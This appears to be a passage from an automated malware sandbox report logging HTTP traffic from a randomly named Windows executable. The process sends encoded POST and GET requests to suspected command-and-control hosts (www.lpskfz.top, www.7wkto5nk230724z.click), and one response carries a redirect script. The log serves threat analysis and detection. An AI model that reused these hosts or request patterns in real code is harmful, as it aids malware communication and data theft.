                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d cc cd 0b 82 30 1c c6 f1 bb 7f 85 ec 52 41 fe e6 4b 82 98 06 61 75 88 41 44 76 a8 4b d8 66 38 5f a6 6d 03 83 e8 7f 2f 28 ba d4 ed f9 3e 87 4f a4 a8 e4 9d 36 69 91 49 95 eb 18 ed d3 95 15 20 93 b3 18 91 f9 29 d9 10 b2 4c 52 64 2a 49 63 84 b1 62 15 f8 0e d4 19 2e 95 f5 0a ab 93 2d 34 5c 40 a9 d0 2c c2 6f 6c 66 44 9f 41 e6 c0 05 d7 c3 3b 67 21 f2 d6 db 83 9b 4f 16 dd 91 d8 bb 5d e5 a3 31 ad fe bc 8f d1 af 63 f4 5c b0 b6 87 ba a5 99 e6 ad 80 42 e6 17 33 1e 14 5a 77 2a c4 38 53 fd f9 e2 d8 2e 5c ab 92 de 80 0a ec 05 50 e8 a6 1e 4c 8d af f6 04 16 e0 29 9b eb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: c8m0RAKauADvKf8_m/(>O6iI )LRd*Icb.-4\@,olfDA;g!O]1c\B3Zw*8S.\PL)0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          26192.168.2.550003206.238.184.168802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:32.503492117 CEST783OUTPOST /msip/ HTTP/1.1
                                                                                                                                                                          Host: www.lpskfz.top
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.lpskfz.top
                                                                                                                                                                          Referer: http://www.lpskfz.top/msip/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 39 34 59 54 33 59 31 7a 48 33 67 4c 79 74 56 41 31 6c 30 4a 58 6f 63 71 69 31 56 64 52 39 53 53 31 47 54 73 44 41 45 6f 48 73 78 75 59 4b 4f 58 41 71 51 6e 30 39 34 61 33 5a 67 73 6a 55 36 6d 77 32 49 64 55 38 54 7a 43 77 38 46 51 57 61 65 54 34 42 4f 70 6e 69 2b 4b 7a 44 57 4a 65 6c 4f 52 33 7a 67 70 43 63 65 4f 32 55 41 50 35 44 58 30 6d 56 4a 46 39 4b 52 51 35 44 79 52 72 6b 4c 34 6a 54 4f 69 4d 56 35 7a 31 4d 7a 4e 45 4a 6c 51 48 49 45 4c 59 77 65 30 78 30 5a 68 4e 54 50 6b 44 4d 44 54 53 49 4d 52 50 79 64 39 64 55 77 70 50 61 79 51 4d 38 4a 69 67 45 70 51 57 48 4a 55 4e 4a 78 49 61 48 78 51 66 2b 2b 73 63 6b 32 37 78 47 78 44 39 76 62 33 33 56 61
                                                                                                                                                                          Data Ascii: 9X=94YT3Y1zH3gLytVA1l0JXocqi1VdR9SS1GTsDAEoHsxuYKOXAqQn094a3ZgsjU6mw2IdU8TzCw8FQWaeT4BOpni+KzDWJelOR3zgpCceO2UAP5DX0mVJF9KRQ5DyRrkL4jTOiMV5z1MzNEJlQHIELYwe0x0ZhNTPkDMDTSIMRPyd9dUwpPayQM8JigEpQWHJUNJxIaHxQf++sck27xGxD9vb33Va
                                                                                                                                                                          Oct 23, 2024 17:14:33.343208075 CEST401INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:33 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d cc cd 0b 82 30 1c c6 f1 bb 7f 85 ec 52 41 fe e6 4b 82 98 06 61 75 88 41 44 76 a8 4b d8 66 38 5f a6 6d 03 83 e8 7f 2f 28 ba d4 ed f9 3e 87 4f a4 a8 e4 9d 36 69 91 49 95 eb 18 ed d3 95 15 20 93 b3 18 91 f9 29 d9 10 b2 4c 52 64 2a 49 63 84 b1 62 15 f8 0e d4 19 2e 95 f5 0a ab 93 2d 34 5c 40 a9 d0 2c c2 6f 6c 66 44 9f 41 e6 c0 05 d7 c3 3b 67 21 f2 d6 db 83 9b 4f 16 dd 91 d8 bb 5d e5 a3 31 ad fe bc 8f d1 af 63 f4 5c b0 b6 87 ba a5 99 e6 ad 80 42 e6 17 33 1e 14 5a 77 2a c4 38 53 fd f9 e2 d8 2e 5c ab 92 de 80 0a ec 05 50 e8 a6 1e 4c 8d af f6 04 16 e0 29 9b eb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: c8m0RAKauADvKf8_m/(>O6iI )LRd*Icb.-4\@,olfDA;g!O]1c\B3Zw*8S.\PL)0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          27192.168.2.550004206.238.184.168802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:35.100370884 CEST1800OUTPOST /msip/ HTTP/1.1
                                                                                                                                                                          Host: www.lpskfz.top
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.lpskfz.top
                                                                                                                                                                          Referer: http://www.lpskfz.top/msip/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 39 34 59 54 33 59 31 7a 48 33 67 4c 79 74 56 41 31 6c 30 4a 58 6f 63 71 69 31 56 64 52 39 53 53 31 47 54 73 44 41 45 6f 48 73 35 75 59 62 75 58 47 35 49 6e 7a 39 34 61 70 70 67 74 6a 55 36 37 77 32 42 55 55 39 75 47 43 7a 49 46 52 31 53 65 45 64 68 4f 6a 6e 69 2b 42 54 44 43 45 2b 6c 68 52 33 6a 73 70 43 4d 65 4f 32 55 41 50 38 48 58 39 56 4e 4a 57 74 4b 53 42 35 44 2b 48 62 6b 7a 34 6a 61 7a 69 4d 42 44 7a 46 73 7a 4d 67 74 6c 63 56 67 45 43 59 77 63 35 52 30 6f 68 4e 66 41 6b 43 68 38 54 53 39 52 52 4a 43 64 34 5a 64 64 35 62 4f 35 55 4d 45 51 67 54 51 52 4a 68 32 74 65 4f 4d 4c 41 36 6a 33 63 39 4f 38 71 4a 77 32 2b 41 6a 34 52 61 4c 4c 36 6e 6c 54 6a 51 4d 78 62 77 59 4f 51 6f 69 41 48 63 6b 72 47 4b 56 32 32 38 6e 69 58 63 4c 48 45 39 31 46 65 4f 6e 58 47 66 4d 58 4b 4a 4d 67 68 65 72 78 42 6d 46 43 64 35 4b 55 31 52 4b 6c 6c 38 66 2f 52 48 6d 54 4c 43 74 39 6a 4b 48 34 73 71 78 4d 69 6a 75 44 2f 6f 2b 48 73 42 53 52 72 66 6f 74 34 7a 41 58 33 44 4d 57 4b 4b 35 62 78 37 71 6d 5a 41 47 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=94YT3Y1zH3gLytVA1l0JXocqi1VdR9SS1GTsDAEoHs5uYbuXG5Inz94appgtjU67w2BUU9uGCzIFR1SeEdhOjni+BTDCE+lhR3jspCMeO2UAP8HX9VNJWtKSB5D+Hbkz4jaziMBDzFszMgtlcVgECYwc5R0ohNfAkCh8TS9RRJCd4Zdd5bO5UMEQgTQRJh2teOMLA6j3c9O8qJw2+Aj4RaLL6nlTjQMxbwYOQoiAHckrGKV228niXcLHE91FeOnXGfMXKJMgherxBmFCd5KU1RKll8f/RHmTLCt9jKH4sqxMijuD/o+HsBSRrfot4zAX3DMWKK5bx7qmZAG2iaGoaWfdQUFRogvQr9Cm11EYJ1KWGpLEQid1iDGUBUOvy9/HH19ltZoE/Hc1Z6XNnT2rdIg/jvtc04lC449rywoL3h4O5KmxgwocfKb+XT/kYGlt4xvaJNYtJkITCUGDtSrmK2vdjJVEGkn594GkSX9mP48FdbOriFj6G1GZb5gf4FpI+HJ4vedPEkcEzJHRAi1b7E1Qz/1jUjDgdDZsxw4PivGkhynI0NDdJ4K015z7FPcgbrPEmMVxTBjWaa/+l923tZl9G3Zj0QXbBqSd+ry49e3EoKM3YPhJ7ZSP3e2eQyr0vjnJS5HcdjtYKa5DOA5Vnzt+OkB/tYt9M28Tp12kqSnNTCJQPyb8HOzrZ04GTXJ4Lf9JE2Lq/10W9b4LvX1JcFzKzsxkpIMVH5af93jM0K4b1GwddFDllRw6aqzO5KCUYhpXD/cmH6/DOaU6h+x5LoO55cNkl/syOvUWk3EV9l0kEUdF+xsUzmmHTNtZlnFl+jwhRdB0b+qOufzpcNMmgbwgFQSP8yqT47rvWtrapEziAH6SVsleJcBP8QzgFRUjVaOwuTp105g0MWZdaR403nIh4O8VAWw5s/o+hqmzkB7x7vMVy8HIwUNi4zGNtmoDsddjstTKXP+qP87vUCl2xn35OZfxPGl/CUXpXtuc2Q+1/FC7q [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:14:36.028959990 CEST401INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:35 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d cc cd 0b 82 30 1c c6 f1 bb 7f 85 ec 52 41 fe e6 4b 82 98 06 61 75 88 41 44 76 a8 4b d8 66 38 5f a6 6d 03 83 e8 7f 2f 28 ba d4 ed f9 3e 87 4f a4 a8 e4 9d 36 69 91 49 95 eb 18 ed d3 95 15 20 93 b3 18 91 f9 29 d9 10 b2 4c 52 64 2a 49 63 84 b1 62 15 f8 0e d4 19 2e 95 f5 0a ab 93 2d 34 5c 40 a9 d0 2c c2 6f 6c 66 44 9f 41 e6 c0 05 d7 c3 3b 67 21 f2 d6 db 83 9b 4f 16 dd 91 d8 bb 5d e5 a3 31 ad fe bc 8f d1 af 63 f4 5c b0 b6 87 ba a5 99 e6 ad 80 42 e6 17 33 1e 14 5a 77 2a c4 38 53 fd f9 e2 d8 2e 5c ab 92 de 80 0a ec 05 50 e8 a6 1e 4c 8d af f6 04 16 e0 29 9b eb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: c8m0RAKauADvKf8_m/(>O6iI )LRd*Icb.-4\@,olfDA;g!O]1c\B3Zw*8S.\PL)0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          28192.168.2.550005206.238.184.168802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:37.647162914 CEST518OUTGET /msip/?9X=w6wz0tlIGVZZ0dJBzjMbYtpV0lMRXZOlwVjrIg8LHpJWNK6lQ7Aml8Id1YcpySOh8nlDQOeKPQwwWGnzCK1puGT5HSmHMN1dTi/bqzhFU0UoC7D1/VBGZ9K3GrDzBJ1/ig==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.lpskfz.top
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:14:38.587069035 CEST412INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:38 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Data Raw: 65 62 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 33 4a 51 59 32 65 34 44 70 5a 4c 30 53 53 6b 35 22 2c 63 6b 3a 22 33 4a 51 59 32 65 34 44 70 5a 4c 30 53 53 6b 35 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 27 68 74 74 70 73 3a 2f 2f 61 73 77 62 66 31 30 32 2e 71 6b 6a 63 78 2e 63 6e 2f 33 38 2e 68 74 6d 6c 27 3b 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: eb<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3JQY2e4DpZL0SSk5",ck:"3JQY2e4DpZL0SSk5"})</script><script>window.location.href ='https://aswbf102.qkjcx.cn/38.html';</script>0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          29192.168.2.550006104.21.3.193802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:43.823385954 CEST796OUTPOST /smpu/ HTTP/1.1
                                                                                                                                                                          Host: www.7wkto5nk230724z.click
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.7wkto5nk230724z.click
                                                                                                                                                                          Referer: http://www.7wkto5nk230724z.click/smpu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 53 52 56 45 47 31 74 4b 4e 50 77 32 6c 31 6a 39 71 45 35 39 59 53 33 4b 4c 37 72 44 4b 69 39 78 43 72 56 63 74 5a 50 76 7a 6c 65 4b 4e 39 6a 57 47 30 59 45 39 72 39 6c 45 2b 33 6e 58 35 69 76 35 64 48 56 76 55 52 75 4b 56 6e 5a 7a 54 51 4a 59 77 65 67 47 61 30 61 66 62 50 6d 79 4e 4c 31 31 53 33 4a 6d 5a 42 46 34 2b 39 49 6b 6a 59 38 4e 57 49 77 4e 4f 52 57 56 2f 50 31 34 37 4f 4a 4c 56 34 4e 78 4c 6a 37 45 47 64 45 45 7a 6b 67 2b 64 44 4e 73 79 57 78 51 6b 77 75 49 6d 4b 70 4f 30 61 79 30 6c 43 57 48 44 70 57 69 67 69 75 6c 76 4a 62 39 55 44 6d 33 4a 75 6e 37 68 2b 2f 52 58 36 66 6f 66 63 3d
                                                                                                                                                                          Data Ascii: 9X=SRVEG1tKNPw2l1j9qE59YS3KL7rDKi9xCrVctZPvzleKN9jWG0YE9r9lE+3nX5iv5dHVvURuKVnZzTQJYwegGa0afbPmyNL11S3JmZBF4+9IkjY8NWIwNORWV/P147OJLV4NxLj7EGdEEzkg+dDNsyWxQkwuImKpO0ay0lCWHDpWigiulvJb9UDm3Jun7h+/RX6fofc=
                                                                                                                                                                          Oct 23, 2024 17:14:44.529236078 CEST956INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:44 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3Scjo%2FVabtYhxFduxl0MmTf%2Fm01%2F1esAo%2ByFCsCGywZg%2FFdw53Dwj5JyLddQOpmBlLsMaSNDTuK9Qk2Mqcd8X5UEaIb5CaWFRfX%2BpW59JVz1jPq2lWKHRDreJP1jmLZS38yDO3ov25QBmlu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8d72adb3395428d5-DFW
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2205&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                          Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                                                                                                          Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                                                                                                                                          Oct 23, 2024 17:14:44.529520988 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          30192.168.2.550007104.21.3.193802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:46.405725002 CEST816OUTPOST /smpu/ HTTP/1.1
                                                                                                                                                                          Host: www.7wkto5nk230724z.click
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.7wkto5nk230724z.click
                                                                                                                                                                          Referer: http://www.7wkto5nk230724z.click/smpu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 53 52 56 45 47 31 74 4b 4e 50 77 32 6b 56 54 39 70 6c 35 39 65 79 33 4c 53 62 72 44 41 43 38 5a 43 72 5a 63 74 59 4c 2f 7a 58 36 4b 4e 64 54 57 48 77 73 45 36 72 39 6c 58 2b 32 6a 5a 5a 69 67 35 64 62 6e 76 56 64 75 4b 56 62 5a 7a 53 67 4a 59 48 43 6a 4a 71 30 69 53 37 50 6b 74 64 4c 31 31 53 33 4a 6d 61 38 67 34 2b 6c 49 6e 53 6f 38 4d 33 49 78 52 65 52 52 57 2f 50 31 79 62 50 4f 4c 56 35 33 78 4b 50 52 45 46 6c 45 45 79 55 67 2b 6f 76 4b 6d 79 57 7a 64 45 78 4d 42 57 54 6d 4b 32 62 2b 39 45 6a 55 59 67 42 6f 6a 57 54 45 2f 4e 42 7a 75 30 76 65 6e 61 6d 51 71 52 66 57 4c 30 71 76 32 49 4b 34 54 2b 72 41 4d 75 53 44 2f 35 46 77 46 2b 2f 35 48 6a 57 4d
                                                                                                                                                                          Data Ascii: 9X=SRVEG1tKNPw2kVT9pl59ey3LSbrDAC8ZCrZctYL/zX6KNdTWHwsE6r9lX+2jZZig5dbnvVduKVbZzSgJYHCjJq0iS7PktdL11S3Jma8g4+lInSo8M3IxReRRW/P1ybPOLV53xKPREFlEEyUg+ovKmyWzdExMBWTmK2b+9EjUYgBojWTE/NBzu0venamQqRfWL0qv2IK4T+rAMuSD/5FwF+/5HjWM
                                                                                                                                                                          Oct 23, 2024 17:14:47.062220097 CEST805INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:47 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C6gHeNQ%2FXdT0nnnlb61jLufWBDlhYwEe1bZI8RD8atF56sPsCi6zKHS8o%2FhWbwfZNnjIZdnJkZ7gG%2BMD4femU4NbUEFC9VIvk%2FWzcld%2Bf9x6x6O5Is7tOwe6XxS%2BVnUgm0uwPNwT%2FVq6C0mL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8d72adc32a12e7bf-DFW
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1545&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=816&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                          Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                                                                                                          Data Ascii: f
                                                                                                                                                                          Oct 23, 2024 17:14:47.062294006 CEST168INData Raw: 39 64 0d 0a ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a
                                                                                                                                                                          Data Ascii: 9dM0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          31192.168.2.550008104.21.3.193802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:49.148613930 CEST1833OUTPOST /smpu/ HTTP/1.1
                                                                                                                                                                          Host: www.7wkto5nk230724z.click
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.7wkto5nk230724z.click
                                                                                                                                                                          Referer: http://www.7wkto5nk230724z.click/smpu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 53 52 56 45 47 31 74 4b 4e 50 77 32 6b 56 54 39 70 6c 35 39 65 79 33 4c 53 62 72 44 41 43 38 5a 43 72 5a 63 74 59 4c 2f 7a 58 79 4b 4f 75 62 57 47 52 73 45 37 72 39 6c 55 2b 32 75 5a 5a 69 48 35 64 53 73 76 56 67 56 4b 51 58 5a 7a 30 55 4a 65 31 71 6a 53 36 30 69 62 62 50 6e 79 4e 4b 78 31 57 62 4e 6d 5a 55 67 34 2b 6c 49 6e 52 77 38 4c 6d 49 78 54 65 52 57 56 2f 50 50 34 37 50 71 4c 55 63 56 78 4b 37 72 59 6c 46 45 4b 79 45 67 38 2b 62 4b 37 43 57 31 59 45 78 71 42 57 75 6d 4b 32 47 50 39 45 48 71 59 6a 52 6f 75 53 66 66 76 4d 74 54 37 48 32 6d 68 4e 75 68 34 57 76 7a 4d 48 44 63 35 70 47 4e 4a 4e 43 6f 4e 70 6d 59 31 72 63 55 42 35 2f 68 51 56 33 73 33 79 53 4e 70 65 7a 35 48 6e 32 47 32 7a 41 50 63 4d 7a 65 74 44 34 4a 4b 4a 68 7a 79 6c 4c 55 34 42 42 69 65 32 32 70 63 74 42 35 68 4e 65 41 6c 2b 79 64 6c 78 33 34 50 70 71 32 73 35 34 77 50 73 4c 6f 47 50 64 6f 2f 31 76 4f 6b 6e 58 36 4d 77 47 42 55 53 44 6d 58 47 6b 4a 55 6b 6e 79 33 35 65 64 45 74 67 72 4a 2b 6e 31 62 4e 57 63 59 5a 30 [TRUNCATED]
